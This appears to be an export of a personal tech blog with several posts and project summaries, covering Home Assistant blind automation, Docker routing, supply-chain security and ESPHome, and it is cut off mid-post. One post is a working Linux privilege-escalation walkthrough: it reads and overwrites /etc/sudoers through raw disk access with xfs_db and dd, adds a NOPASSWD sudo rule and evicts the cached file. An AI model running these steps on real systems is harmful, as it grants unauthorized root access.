[{"content":"When working in my office during the day, I enjoy having my windows open to get as much natural light in as possible. However, this sometimes comes at a cost: glare. During certain times of the day, if there is little cloud cover, I get too much glare on my computer screen and it creates eye-strain, or makes reading difficult or distracting. So I took it upon myself to automate this problem away! This post outlines the process I took and how it works.\nConvert a Physical Problem into a Digital Problem I want to open and close my blinds automatically. This requires something that can physically control my blinds and expose an API or service which Home Assistant can call to make the physical state match the desired state. For this I chose to use a few of the SwitchBot Blind Tilt controllers. SwitchBot has a gold quality integration that makes use of ESPHome Bluetooth Proxies.\nOnce setup, the SwitchBot app is no longer needed, you can have complete control with Home Assistant. If you have multiple windows facing the same direction, you can create a group to control them all with a single entity. If you have windows facing different directions, you will need a separate glare sensor and automation for each direction since the frustum angles will differ.\nAutomating the \u0026ldquo;Glare\u0026rdquo; State The desired logic is the window blinds should be open if all of the following are true, else closed:\nthe sun is above the horizon (there is daylight outside) it is not cloudy the sun is not directly visible from my seated position (either to my eyes or reflected on my screen) The first two can be determined by using the sun and weather entities in Home Assistant, but that last one requires some math.\nCalculating Glare Frustum In order to mathematically determine if there is glare, we need to determine the frustum between my eyes, and the window, relative to each other. This provides a projected bounding box to compare to the position of the sun using its azimuth and elevation.\nTo calculate this, we need:\nwindow heading (which compass direction it faces — use a compass app on your phone pointed perpendicular out through the window) distance between eyes and window distance between center of eyes and: window\u0026rsquo;s horizontal left edge window\u0026rsquo;s horizontal right edge vertical top of window vertical bottom of window Once these measurements are taken, we can calculate the solar Azimuth and Elevation bounds for which there is glare.\nTake these measurements and enter their values in the following python script to calculate the boundaries. The variable names match the labels in the diagram above.\nimport math # --- INPUTS: REPLACE THESE WITH YOUR MEASUREMENTS --- # Units don\u0026#39;t matter (cm/inches) as long as they are consistent. # 1. Compass direction your window faces (0=N, 90=E, 180=S) HEADING = 90 # 2. Distance from eye to window glass D = 100 # 3. Horizontal Offsets (Positive numbers) # How far LEFT of your nose is the left window edge? W_LEFT = 50 # How far RIGHT of your nose is the right window edge? W_RIGHT = 50 # 4. Vertical Offsets (Positive numbers) # How far UP from eye level is the top of the glass? H_TOP = 40 # How far DOWN from eye level is the bottom of the glass? H_BOTTOM = 10 # 5. Artificial Horizon (Optional) # If structures outside the window (neighbor\u0026#39;s roof, fence, etc.) block # the sun below a certain angle, set E_MIN to that angle in degrees. # Set to 0 if there are no obstructions. E_MIN = 0 # --- ALGORITHM --- def calculate_angles(): # 1. Calculate Field of View angles relative to the \u0026#34;Center Line\u0026#34; of sight # arctan(opposite / adjacent) * (180 / pi) # Horizontal angles (relative to straight ahead) angle_left = math.degrees(math.atan(W_LEFT / D)) angle_right = math.degrees(math.atan(W_RIGHT / D)) # Vertical angles (relative to horizon/eye-level) angle_up = math.degrees(math.atan(H_TOP / D)) angle_down = math.degrees(math.atan(H_BOTTOM / D)) # 2. Convert to World Coordinates (Azimuth \u0026amp; Elevation) # Azimuth: North is 0. # If looking out window (HEADING), Left is (-), Right is (+) az_min = HEADING - angle_left az_max = HEADING + angle_right # Sun elevation is relative to the horizon (0°). # The sun is never below the horizon, so min elevation defaults to 0. # Use E_MIN to account for structures blocking the sun at low angles. # Max elevation is the angle from eye level to the top of the window. el_min = max(E_MIN, 0.0) el_max = angle_up print(\u0026#34;-\u0026#34; * 30) print(\u0026#34;HOME ASSISTANT CONFIGURATION VALUES\u0026#34;) print(\u0026#34;-\u0026#34; * 30) print(f\u0026#34;Azimuth Min: {az_min:.1f}\u0026#34;) print(f\u0026#34;Azimuth Max: {az_max:.1f}\u0026#34;) print(f\u0026#34;Elevation Min: {el_min:.1f}\u0026#34;) print(f\u0026#34;Elevation Max: {el_max:.1f}\u0026#34;) print(\u0026#34;-\u0026#34; * 30) if __name__ == \u0026#34;__main__\u0026#34;: calculate_angles() Glare Template Sensor Now that the Azimuth and Elevation boundaries are calculated, we can create a binary template sensor in Home Assistant to reflect the current glare state.\nIn order to make the automation even simpler, the template will also take into consideration the current weather cloud coverage.\nReplace the values below with the bounds returned by the python script. You may also need to update the weather provider if a different one is in use.\ntemplate: - binary_sensor: - name: \u0026#34;Office Glare\u0026#34; unique_id: office_glare icon: mdi:sun-angle state: \u0026gt; {# --- SENSOR INPUTS --- #} {% set az = states(\u0026#39;sensor.sun_solar_azimuth\u0026#39;) | float(0) %} {% set el = states(\u0026#39;sensor.sun_solar_elevation\u0026#39;) | float(0) %} {% set clouds = state_attr(\u0026#39;weather.pirate_weather\u0026#39;, \u0026#39;cloud_coverage\u0026#39;) | float(0) %} {# --- WINDOW CONFIGURATION --- #} {# The compass direction range where the window is visible #} {% set az_min = 92.0 %} {% set az_max = 138.4 %} {# The vertical range (Horizon -\u0026gt; Window Top) #} {# Min is 15.0 due to neighbor\u0026#39;s roof blocking sun below that angle #} {% set el_min = 15.0 %} {% set el_max = 33.0 %} {# --- WEATHER CONFIGURATION --- #} {# Glare only happens if clouds are low. (0-100 scale) #} {% set cloud_threshold = 30 %} {# --- LOGIC --- #} {% set is_aligned_horizontally = az_min \u0026lt;= az \u0026lt;= az_max %} {% set is_aligned_vertically = el_min \u0026lt;= el \u0026lt;= el_max %} {% set is_clear_sky = clouds \u0026lt; cloud_threshold %} {{ is_aligned_horizontally and is_aligned_vertically and is_clear_sky }} Once created, the sensor binary_sensor.office_glare returns an on state when the sun is in a position that would cause glare, and off otherwise.\nNote If your window faces near North, the azimuth range may wrap around 0°/360° (e.g., 350° to 10°). In that case, change is_aligned_horizontally to use or instead of and: az \u0026gt;= az_min or az \u0026lt;= az_max.\nSolar Glare Automation Now that the glare sensor is created, an automation is needed to control the blinds given the glare and sun state. The blinds should only be open when the sun is up AND there is no glare; otherwise they close. The glare trigger uses a 2-minute buffer to prevent the blinds from rapidly toggling on partly cloudy days.\nThe SwitchBot Blind Tilt uses tilt_position values from 0 to 100, where 0 is fully closed and 50 is fully open (horizontal). Values above 50 tilt the blinds the other direction.\nThe following automation does that:\nalias: Office Blinds mode: single triggers: - trigger: sun event: sunset - trigger: sun event: sunrise - trigger: state entity_id: - binary_sensor.office_glare for: minutes: 2 actions: - if: - condition: sun before: sunset after: sunrise - condition: state entity_id: binary_sensor.office_glare state: \u0026#34;off\u0026#34; then: - action: cover.set_cover_tilt_position data: tilt_position: 50 target: entity_id: cover.office_blinds else: - action: cover.set_cover_tilt_position data: tilt_position: 0 target: entity_id: cover.office_blinds After running this for a few days, you may need to adjust the boundaries a little. Here are some tips:\nGlare starts before blinds close? Decrease az_min or el_min to widen the start of the glare range. Blinds close but there\u0026rsquo;s no glare yet? Increase az_min or el_min to narrow the start of the glare range. Blinds open but there\u0026rsquo;s still glare? Increase az_max or el_max to widen the end of the glare range. Blinds close on overcast days? Increase cloud_threshold. Blinds close when sun is behind a roof/structure? Increase el_min. Once you get the values correct, it is very stable. Since the values for the sun\u0026rsquo;s Azimuth and Elevation are used, the calculations should work year round, even as the angle of the sun changes season to season.\n","permalink":"https://lanrat.com/posts/home-assistant-sun-glare-automation/","summary":"\u003cp\u003eWhen working in my office during the day, I enjoy having my windows open to get as much natural light in as possible. However, this sometimes comes at a cost: glare. During certain times of the day, if there is little cloud cover, I get too much glare on my computer screen and it creates eye-strain, or makes reading difficult or distracting. So I took it upon myself to automate this problem away! This post outlines the process I took and how it works.\u003c/p\u003e","title":"The Sun vs. My Monitor: Winning the Glare War with Home Assistant"},{"content":"\nThe disk group seems innocent enough - it\u0026rsquo;s meant for disk management utilities. But give someone disk group access and you\u0026rsquo;ve essentially handed them root. Here\u0026rsquo;s how to exploit raw block device access to bypass all file permissions and escalate privileges.\nWhile the XKCD comic above is tongue-in-cheek, using dd for filesystem manipulation is genuinely powerful and dangerous. The Linux disk group allows raw access to disks on the system. It\u0026rsquo;s meant to allow members to use tools to manage disk partitions and format disks at the block level. However, it can also be used to get arbitrary file read/write by directly editing the disk contents even if file system permissions forbid it. For this reason it is a very privileged group and should be considered equivalent to root access.\nThe disk group is usually gid 6 and allows full read/write access to block devices.\nShowing raw disk devices on a Linux system belonging to the disk group\nIf you can get into the disk group (without needing root access), you can use tools like debugfs for ext4 filesystems and xfs_db for xfs filesystems to interact with the disks. debugfs is quite user friendly with options to directly copy files into and out of the raw disk. xfs_db, on the other hand, is much lower level and will require using other tools such as dd to read/write to files on the disk.\nFor this guide, we will be working with xfs_db on an xfs filesystem.\nFile Read Example with xfs filesystem over LVM. Here rhel_eda--c-root is a LVM volume mapped to /dev/dm-0\nThese tools can let you view any data on the raw disk device, regardless of the filesystem permissions. Even if the volume is mounted.\nIf the filesystem is mounted these tools may prevent writing, but we can use dd to work around that limitation.\nIn order to read the file, we need to get the offsets of the file\u0026rsquo;s blocks from the filesystem. In order to get this, we can start with the inode of the file on the filesystem to query its block addresses. ls -li can list the inode of any file, even if we don\u0026rsquo;t have read access to it.\nNote If the file is in a directory we don\u0026rsquo;t have access to, we can use xfs_db or debugfs on a parent directory that we do have access to to list the files or sub-directories, their inodes and go into each one until the inode of the target file is found.\nGetting the inode of /etc/sudoers even though we do not have read access to the file:\nGetting the startblock and number of blocks that make up this file:\nUsing xfs_db to print part of the first block manually, even though we do not have filesystem read access\n# this prints the block map for the file at the given inode $ xfs_db -r /dev/dm-0 -c \u0026#39;inode \u0026lt;INODE_NUM\u0026gt;\u0026#39; -c \u0026#39;bmap\u0026#39; # print the file\u0026#39;s first block as hex # use sed and xxd to print as ascii $ xfs_db -r /dev/dm-0 -c \u0026#39;inode \u0026lt;INODE_NUM\u0026gt;\u0026#39; -c \u0026#39;dblock 0\u0026#39; -c \u0026#39;type data\u0026#39; -c print | sed \u0026#39;s/.*://; s/[[:space:]]//g\u0026#39; | xxd -r -p Here we see that the file is 2 blocks. We read the first block by specifying dblock 0\nThe file is printed as data so that it is displayed in hex. Then sed 's/.*://; s/[[:space:]]//g' removes white space and line numbers so that xxd -r -p can convert the hex data back into text.\nTo get the 2nd block (or others) use dblock 1 replacing 1 with the 0-offset block number.\nFile Write Reading protected files is interesting, but the real fun begins when we start writing.\nIn order to write to the file system while the drive is mounted, we can use dd and seek to the exact offset of the file contents we want to overwrite.\nNote This method only changes the file contents, it does not alter any of the filesystem’s inode data, so only overwrite existing data, bytes for bytes. Do not attempt to append or shrink a file. While possible, that would involve updating the metadata in the file system and is more difficult and outside the scope of this article.\nIn order to write directly to the disk, we need to know the offset to write at. This can be manually calculated from the startblock and agblocks from xfs_db. Below is a shell script to automate that:\n#!/bin/bash INODE=\u0026#34;$1\u0026#34; # pass inode as argument DEVICE=/dev/dm-0 OFFSET_IN_FILE=0 # Change this to edit at a different position in the file # Get block info BMAP_OUTPUT=$(xfs_db -r $DEVICE -c \u0026#34;inode $INODE\u0026#34; -c \u0026#39;bmap\u0026#39; | grep \u0026#34;startblock\u0026#34;) # Extract AG and block (this assumes format: startblock XXXXX (AG/BLOCK)) AG=$(echo \u0026#34;$BMAP_OUTPUT\u0026#34; | sed -n \u0026#39;s/.*(\\([0-9]*\\)\\/[0-9]*).*/\\1/p\u0026#39;) BLOCK_IN_AG=$(echo \u0026#34;$BMAP_OUTPUT\u0026#34; | sed -n \u0026#39;s/.*([0-9]*\\/\\([0-9]*\\)).*/\\1/p\u0026#39;) # Get agblocks from xfs_db # You can find this value by running: xfs_db -r $DEVICE -c \u0026#39;sb 0\u0026#39; -c \u0026#39;print agblocks\u0026#39; AGBLOCKS=$(xfs_db -r $DEVICE -c \u0026#39;sb 0\u0026#39; -c \u0026#39;print agblocks\u0026#39; | awk \u0026#39;{print $3}\u0026#39;) # Calculate ABSOLUTE_BLOCK=$((AG * AGBLOCKS + BLOCK_IN_AG)) BYTE_OFFSET=$((ABSOLUTE_BLOCK * 4096 + OFFSET_IN_FILE)) echo \u0026#34;AG: $AG\u0026#34; echo \u0026#34;Block in AG: $BLOCK_IN_AG\u0026#34; echo \u0026#34;Absolute block: $ABSOLUTE_BLOCK\u0026#34; echo \u0026#34;Byte offset: $BYTE_OFFSET\u0026#34; In order to test this and ensure you have the right offset, always read the file contents first using dd.\nReading the start of the first block of /etc/sudoers with dd to confirm that the offset into the disk is correct\n# read 1000 bytes from the data at \u0026lt;BYTE_OFFSET\u0026gt; dd if=/dev/dm-0 bs=1 status=none skip=\u0026lt;BYTE_OFFSET\u0026gt; count=1000 If we see the data we expected, it is safe to overwrite. If dd prints something else, recheck your offsets. If you write to the wrong location you could corrupt the filesystem and cause unexpected behavior.\nFile writing: Privilege Escalation If you are a member of the disk group, but not able to become root or use sudo, you can add yourself to /etc/sudoers to gain full root privileges.\nYou would want to add the following: YOUR_USERNAME ALL=(ALL) NOPASSWD: ALL\nreplacing YOUR_USERNAME with the username you want to add to sudoers.\nWarning Using the dd option conv=notrunc is CRITICAL! without it the filesystem could be truncated!\nOnce done, if any program reads the file it may still not see the changes. This is because the kernel has cached the previous version of the file in memory. Since we did not edit the file using the normal system calls, the kernel does not know the file has been changed on disk. We need to tell the kernel to invalidate the cache so that the file is read from disk to see the changes.\nWarning If another process attempts to write to the file, it may overwrite your changes and flush the cached version back to disk.\nThe normal way to do this would be to have the kernel be aware of any file changes, for example a touch /path/to/file would normally work, but since we do not have write access to the file in the OS this is not possible.\nAnother possibility would be to tell the kernel to drop all file system caches, but this still requires root, which we do not yet have:\n# This would force the kernel to drop cached file data # Only the root user can write here, so this would fail echo 3 \u0026gt; /proc/sys/vm/drop_caches However, the kernel does allow any user with read access to a file to evict it from the file system cache.\nIf the vmtouch command is available, you can run vmtouch -e /path/to/file to evict it from the kernel\u0026rsquo;s cache so that the next time the file is accessed a fresh copy is read from disk. If vmtouch is not installed, you can download the source and compile it yourself.\nAlternatively, the same can be done with this minimal python script:\n#!/usr/bin/env python3 import os import sys if len(sys.argv) != 2: print(f\u0026#34;Usage: {sys.argv[0]} /path/to/file\u0026#34;) sys.exit(1) file_path = sys.argv[1] try: # You only need read access to open the file fd = os.open(file_path, os.O_RDONLY) stat_info = os.fstat(fd) # Tell the kernel we don\u0026#39;t need the cache for this file # (from offset 0 to the end of the file) os.posix_fadvise(fd, 0, stat_info.st_size, os.POSIX_FADV_DONTNEED) os.close(fd) print(f\u0026#34;Successfully evicted \u0026#39;{file_path}\u0026#39; from cache.\u0026#34;) except FileNotFoundError: print(f\u0026#34;Error: File not found at \u0026#39;{file_path}\u0026#39;\u0026#34;) except PermissionError: print(f\u0026#34;Error: No read permission for \u0026#39;{file_path}\u0026#39;\u0026#34;) except Exception as e: print(f\u0026#34;An error occurred: {e}\u0026#34;) After the cache eviction, the next time the file is read the new modified version will be used from disk.\nsudo -s works!\n","permalink":"https://lanrat.com/posts/linux-privilege-escalation-disk-group-dd/","summary":"\u003cp\u003e\u003ca href=\"https://xkcd.com/378/\"\u003e\u003cimg alt=\"XKCD Real Programmers\" loading=\"lazy\" src=\"/posts/linux-privilege-escalation-disk-group-dd/images/xkcd-real-programmers.webp#center\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThe \u003ccode\u003edisk\u003c/code\u003e group seems innocent enough - it\u0026rsquo;s meant for disk management utilities. But give someone \u003ccode\u003edisk\u003c/code\u003e group access and you\u0026rsquo;ve essentially handed them root. Here\u0026rsquo;s how to exploit raw block device access to bypass all file permissions and escalate privileges.\u003c/p\u003e\n\u003cp\u003eWhile the XKCD comic above is tongue-in-cheek, using \u003ccode\u003edd\u003c/code\u003e for filesystem manipulation is genuinely powerful and dangerous. The Linux \u003ccode\u003edisk\u003c/code\u003e group allows raw access to disks on the system. It\u0026rsquo;s meant to allow members to use tools to manage disk partitions and format disks at the block level. However, it can also be used to get arbitrary file read/write by directly editing the disk contents even if file system permissions forbid it. For this reason it is a very privileged group and should be considered equivalent to root access.\u003c/p\u003e","title":"Linux Arbitrary File Write and Privilege Escalation with dd"},{"content":"A browser-based and CLI tool for generating WireGuard configurations compatible with Cloudflare WARP. The application generates keypairs locally in the browser or CLI, registers them with Cloudflare\u0026rsquo;s WARP API, and outputs a complete WireGuard configuration file with QR code for easy mobile import.\nAll processing happens client-side with no server-side storage. Configuration options include DNS server selection, MTU adjustment, allowed IPs, and persistent keepalive settings. A command-line shell script is also available for terminal-based workflows.\nExample:\n./scripts/warp-register.sh \u0026gt; warp.conf ","permalink":"https://lanrat.com/projects/cloudflare-warp-config-generator/","summary":"\u003cp\u003eA browser-based and CLI tool for generating WireGuard configurations compatible with Cloudflare WARP. The application generates keypairs locally in the browser or CLI, registers them with Cloudflare\u0026rsquo;s WARP API, and outputs a complete WireGuard configuration file with QR code for easy mobile import.\u003c/p\u003e\n\u003cp\u003eAll processing happens client-side with no server-side storage. Configuration options include DNS server selection, MTU adjustment, allowed IPs, and persistent keepalive settings. A command-line shell script is also available for terminal-based workflows.\u003c/p\u003e","title":"Cloudflare WARP Config Generator"},{"content":"Got a bunch of MikroTik switches running SwOS or SwOS Lite with no good way to manage them centrally? This library has you covered.\nBuilt by reverse engineering the SwOS HTTP API, it provides complete programmatic access to all switch features. Works with both SwOS and SwOS Lite, supports everything from port configs and PoE to VLANs and SNMP settings.\nComes with a CLI tool for quick lookups and a full Ansible module for managing your entire switch fleet through YAML playbooks. Compatible with CRS305, CRS310, CRS326, CSS610 and other SwOS-based switches.\n","permalink":"https://lanrat.com/projects/mikrotik-swos-python-library/","summary":"\u003cp\u003eGot a bunch of MikroTik switches running SwOS or SwOS Lite with no good way to manage them centrally? This library has you covered.\u003c/p\u003e\n\u003cp\u003eBuilt by reverse engineering the SwOS HTTP API, it provides complete programmatic access to all switch features. Works with both SwOS and SwOS Lite, supports everything from port configs and PoE to VLANs and SNMP settings.\u003c/p\u003e\n\u003cp\u003eComes with a CLI tool for quick lookups and a full Ansible module for managing your entire switch fleet through YAML playbooks. Compatible with CRS305, CRS310, CRS326, CSS610 and other SwOS-based switches.\u003c/p\u003e","title":"MikroTik SwOS Python Library"},{"content":"A collection of custom plugins for TRMNL e-ink displays. The repository provides a Docker-based development environment for creating and testing plugins that extend TRMNL functionality.\n","permalink":"https://lanrat.com/projects/trmnl-plugins/","summary":"\u003cp\u003eA collection of custom plugins for \u003ca href=\"https://trmnl.com/?ref=mrlanrat\"\u003eTRMNL\u003c/a\u003e e-ink displays. The repository provides a Docker-based development environment for creating and testing plugins that extend TRMNL functionality.\u003c/p\u003e","title":"TRMNL Plugins"},{"content":"In 2016, removing an 11-line npm package called left-pad broke thousands of projects worldwide. Nine years later, attackers compromised packages with 2.6 billion weekly downloads using phishing and self-propagating malware.\nThe Problem: A Decade of Escalating Supply Chain Attacks Timeline March 2016: Left-pad incident - removing an 11-line dependency broke thousands of projects including Babel and React.\nOctober 2021: ua-parser-js compromise - library with 7M+ weekly downloads hijacked multiple times, injecting cryptocurrency miners and password stealers.\nJanuary 2022: colors.js/faker.js sabotage - maintainer intentionally broke packages with 20M+ weekly downloads.\nSeptember 2025: Shai-Hulud attack - 20+ packages including chalk, debug, ansi-styles, and strip-ansi with 2.6B+ weekly downloads compromised through maintainer phishing.\nAttack Vectors Typosquatting: Malicious packages with names similar to popular libraries Dependency Confusion: Public packages mimicking private internal packages with higher version numbers Maintainer Account Compromise: Targeting legitimate maintainer credentials Subdependency Poisoning: Compromising lesser-known dependencies deep in the tree Minimal Dependencies in Practice Dependency management is about making informed choices. npm\u0026rsquo;s micro-package culture creates vast dependency trees, while languages like Go emphasize standard libraries and focused dependencies.\nNote This post isn\u0026rsquo;t about Node.js/npm versus Go. These principles apply to any language ecosystem, the key is understanding your dependency choices and their security implications regardless of the platform you\u0026rsquo;re using.\nReal-World Examples of \u0026ldquo;Less is More\u0026rdquo; For the libraries I maintain (eg: czds and extsort), minimal dependencies are a core principle. Sometimes I\u0026rsquo;ll implement something like minimal JWT parsing myself rather than pulling in a full cryptographic library with dozens of dependencies.\nThe github.com/miekg/dns Go library demonstrates this perfectly: it\u0026rsquo;s feature-complete for DNS operations but relies only on Go\u0026rsquo;s standard library and a few golang.org/x/ packages. Compare this to typical npm packages that can easily pull in 100+ transitive dependencies for similar functionality.\nEach dependency is a potential attack vector. Libraries with many dependencies spread trust across countless organizations and individuals.\nDependency Decision Framework Every dependency addition is a decision point. The difference between my JWT implementation and a typical npm approach: 20 lines of focused code versus potentially hundreds of transitive dependencies.\nRisk Assessment Before adding any dependency:\nScope: Is this dependency doing more than I need? Maintenance: How many maintainers does it have? When was it last updated? Trust Surface: How many transitive dependencies does it bring? Value Ratio: What\u0026rsquo;s the complexity vs. security impact ratio? Implementation vs. Import Implement yourself when:\nSimple, well-defined functionality (like string padding or basic parsing) Security-critical code where you need full control Stable requirements unlikely to change The \u0026ldquo;wheel\u0026rdquo; being reinvented is actually a simple function Import dependencies for:\nComplex algorithms you\u0026rsquo;re unlikely to implement correctly Cryptographic functions requiring specialized expertise Well-established protocols with extensive edge cases Libraries with strong track records and minimal dependencies My JWT parsing handles the specific decoding I need without the complexity of a full cryptographic library. The tradeoff: I handle basic token validation, but avoid 50+ dependencies that come with full-featured JWT libraries.\nEcosystem Considerations The npm ecosystem\u0026rsquo;s micro-package culture creates different risks than Go\u0026rsquo;s standard-library approach:\nnpm: 100+ transitive dependencies for basic functionality is common Go: Standard library covers most needs, focused external packages Python: Mix of comprehensive standard library and ecosystem packages Risk: Each ecosystem\u0026rsquo;s culture shapes your attack surface Core Principles Every dependency is a trust decision - you\u0026rsquo;re trusting not just the library, but its entire dependency tree Evaluate the value-to-risk ratio - sometimes 10 lines of custom code beats 50 transitive dependencies Audit what you actually need - many libraries provide far more functionality than you\u0026rsquo;ll use Factor in long-term maintenance - consider the burden of keeping dependencies updated vs. maintaining focused implementations Defensive Strategies Dependency Auditing: Use npm ls or go mod graph to visualize your complete dependency chain. Look for unexpected depth or breadth.\nVersion Pinning: Pin exact versions rather than using ranges. This prevents automatic malicious updates but requires active management for security patches.\nVulnerability Scanning: Integrate tools like npm audit, go mod tidy, or language-specific security scanners into your CI/CD pipeline.\nStandard Library First: Default to language standard libraries when possible. They\u0026rsquo;re maintained by core language teams and have fewer dependencies.\nRegular Cleanup: Periodically audit and remove unused dependencies. Dead code dependencies still represent attack surface without value.\nSupply chain attacks have evolved from accidental disruption to targeted campaigns. Every dependency extends trust to its maintainers and their entire dependency tree. Minimal dependencies are essential security practice.\n","permalink":"https://lanrat.com/posts/minimal-dependencies-supply-chain/","summary":"\u003cp\u003eIn 2016, removing an 11-line npm package called left-pad broke thousands of projects worldwide. Nine years later, attackers compromised packages with 2.6 billion weekly downloads using phishing and self-propagating malware.\u003c/p\u003e\n\u003ch2 id=\"the-problem-a-decade-of-escalating-supply-chain-attacks\"\u003eThe Problem: A Decade of Escalating Supply Chain Attacks\u003c/h2\u003e\n\u003ch3 id=\"timeline\"\u003eTimeline\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eMarch 2016\u003c/strong\u003e: \u003ca href=\"https://en.wikipedia.org/wiki/Npm_left-pad_incident\"\u003eLeft-pad incident\u003c/a\u003e - removing an 11-line dependency broke thousands of projects including Babel and React.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eOctober 2021\u003c/strong\u003e: \u003ca href=\"https://www.bleepingcomputer.com/news/security/popular-npm-library-hijacked-to-install-password-stealers-miners/\"\u003eua-parser-js compromise\u003c/a\u003e - library with 7M+ weekly downloads hijacked multiple times, injecting cryptocurrency miners and password stealers.\u003c/p\u003e","title":"Software Supply Chain Security: The Case for Minimal Dependencies"},{"content":"Drouter provides dynamic route injection for Docker containers through label-based configuration. The systemd service monitors Docker containers and automatically configures static routes in their network namespaces without requiring elevated privileges within the containers themselves.\nThe system uses Docker labels to specify routing rules and applies them automatically when containers start or stop. This enables complex networking setups where containers need custom routing tables while maintaining security by avoiding privileged container execution for network configuration tasks.\n","permalink":"https://lanrat.com/projects/drouter/","summary":"\u003cp\u003eDrouter provides dynamic route injection for Docker containers through label-based configuration. The systemd service monitors Docker containers and automatically configures static routes in their network namespaces without requiring elevated privileges within the containers themselves.\u003c/p\u003e\n\u003cp\u003eThe system uses Docker labels to specify routing rules and applies them automatically when containers start or stop. This enables complex networking setups where containers need custom routing tables while maintaining security by avoiding privileged container execution for network configuration tasks.\u003c/p\u003e","title":"Drouter"},{"content":"When working with Docker containers on complex networks, you often need to add static routes so containers can reach networks that aren\u0026rsquo;t directly connected to their default gateway. This becomes especially important when using macvlan network drivers where containers get their own IP addresses on your physical network.\nI\u0026rsquo;ve just released drouter, a lightweight systemd service that solves this problem by automatically injecting routes into Docker containers based on simple labels.\nThe Problem Consider this scenario: you\u0026rsquo;re using a macvlan network driver so your containers get real IP addresses on your network (say 192.168.1.0/24). Your router is at 192.168.1.1, but you have additional internal subnets like 10.0.0.0/8 that are reachable through a different gateway at 192.168.1.254.\nWithout custom routes, your containers can only reach networks directly connected to their default gateway. Traffic to 10.0.0.0/8 would fail because the container doesn\u0026rsquo;t know how to route to that network.\nTraditional solutions require either:\nRunning containers with NET_ADMIN capabilities (security risk) Manual route configuration after container startup (not scalable) Complex init scripts inside containers (maintenance overhead) The Solution Drouter monitors Docker container events and automatically adds routes to containers based on labels. When a container starts with drouter.routes.* labels, the service enters the container\u0026rsquo;s network namespace and configures the specified routes.\nHere\u0026rsquo;s how simple it is to configure:\n# docker-compose.yml services: app: image: nginx networks: - macvlan_net labels: drouter.routes.ipv4: \u0026#34;10.0.0.0/8 via 192.168.1.254\u0026#34; Now your container can reach the 10.0.0.0/8 network through the 192.168.1.254 gateway, even though it\u0026rsquo;s not the default route.\nInstallation Drouter runs as a systemd service on your Docker host. See the installation instructions on GitHub for the latest setup steps.\nConfiguration Examples Multiple Routes You can specify multiple routes using semicolon separation or multi-line format:\n# Single line with semicolons labels: drouter.routes.ipv4: \u0026#34;10.0.0.0/8 via 192.168.1.254;172.16.0.0/12 via 192.168.1.253\u0026#34; # Multi-line format (easier to read) labels: drouter.routes.ipv4: | 10.0.0.0/8 via 192.168.1.254 172.16.0.0/12 via 192.168.1.253 IPv6 Support Drouter fully supports IPv6 routing:\nlabels: drouter.routes.ipv6: \u0026#34;2001:db8::/32 via fe80::1\u0026#34; Docker CLI For non-compose deployments:\ndocker run -d \\ --label drouter.routes.ipv4=\u0026#34;10.0.0.0/8 via 192.168.1.254\u0026#34; \\ --net macvlan_net \\ nginx How It Works Drouter uses Docker\u0026rsquo;s event API to monitor container lifecycle events. When a container starts with route labels, it:\nDetects the container\u0026rsquo;s network namespace Uses nsenter to enter the namespace Adds routes with standard ip route add commands Skips duplicate routes to avoid conflicts The service handles Docker daemon restarts gracefully and doesn\u0026rsquo;t require elevated privileges for the containers themselves.\nWhy This Matters This approach is particularly valuable for:\nMacvlan networks: Containers with real IPs need custom routing for internal networks Multi-homed environments: Networks with multiple gateways or complex topologies Microservices: Different services needing access to different network segments Security: Avoiding NET_ADMIN capabilities in containers Before drouter, I was manually configuring routes or writing custom init scripts. Now it\u0026rsquo;s as simple as adding a label to my compose file.\nThe source code and detailed documentation are available on GitHub. Give it a try if you\u0026rsquo;re dealing with complex Docker networking scenarios!\n","permalink":"https://lanrat.com/posts/drouter-docker-routing/","summary":"\u003cp\u003eWhen working with Docker containers on complex networks, you often need to add static routes so containers can reach networks that aren\u0026rsquo;t directly connected to their default gateway. This becomes especially important when using \u003ca href=\"https://docs.docker.com/network/drivers/macvlan/\"\u003emacvlan\u003c/a\u003e network drivers where containers get their own IP addresses on your physical network.\u003c/p\u003e\n\u003cp\u003eI\u0026rsquo;ve just released \u003ca href=\"https://github.com/lanrat/drouter\"\u003edrouter\u003c/a\u003e, a lightweight systemd service that solves this problem by automatically injecting routes into Docker containers based on simple labels.\u003c/p\u003e\n\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eConsider this scenario: you\u0026rsquo;re using a macvlan network driver so your containers get real IP addresses on your network (say \u003ccode\u003e192.168.1.0/24\u003c/code\u003e). Your router is at \u003ccode\u003e192.168.1.1\u003c/code\u003e, but you have additional internal subnets like \u003ccode\u003e10.0.0.0/8\u003c/code\u003e that are reachable through a different gateway at \u003ccode\u003e192.168.1.254\u003c/code\u003e.\u003c/p\u003e","title":"Drouter: Dynamic Route Injection for Docker Containers"},{"content":"ARIN IPv4 Wait-list Tracking analyzes ARIN\u0026rsquo;s IPv4 address wait-list and provides statistical insights into wait times and allocation patterns. The Python-based system tracks historical data on IPv4 block requests and clearances to estimate processing times for different network block sizes.\nThe web dashboard displays real-time analytics including current wait-list sizes, estimated wait times for /22, /23, and /24 blocks, and historical trends in IPv4 address allocation. This tool helps network administrators understand IPv4 scarcity patterns and plan address allocation strategies as IPv4 exhaustion continues.\n","permalink":"https://lanrat.com/projects/arin-ipv4-waitlist-tracking/","summary":"\u003cp\u003eARIN IPv4 Wait-list Tracking analyzes ARIN\u0026rsquo;s IPv4 address wait-list and provides statistical insights into wait times and allocation patterns. The Python-based system tracks historical data on IPv4 block requests and clearances to estimate processing times for different network block sizes.\u003c/p\u003e\n\u003cp\u003eThe web dashboard displays real-time analytics including current wait-list sizes, estimated wait times for /22, /23, and /24 blocks, and historical trends in IPv4 address allocation. This tool helps network administrators understand IPv4 scarcity patterns and plan address allocation strategies as IPv4 exhaustion continues.\u003c/p\u003e","title":"ARIN IPv4 Waitlist Tracking"},{"content":"When developing with ESPHome on ESP32 devices, crashes can be frustrating to debug without proper stack traces. Enabling coredumps provides detailed crash information to help identify the root cause of issues.\nConfiguration To enable coredump functionality, you\u0026rsquo;ll need to modify your ESPHome configuration and create a custom partition table. This setup is for the Arduino framework - ESP-IDF configurations will differ slightly.\nESPHome Configuration Add the following to your ESPHome YAML configuration:\nesp32: framework: type: arduino # Partitions file seems to require full path partitions: /full/path/to/custom_partitions_core_dump.csv esphome: platformio_options: build_flags: - -DCONFIG_ESP_COREDUMP_ENABLE_TO_FLASH=y - -DCONFIG_ESP32_COREDUMP_DATA_FORMAT_ELF=y - 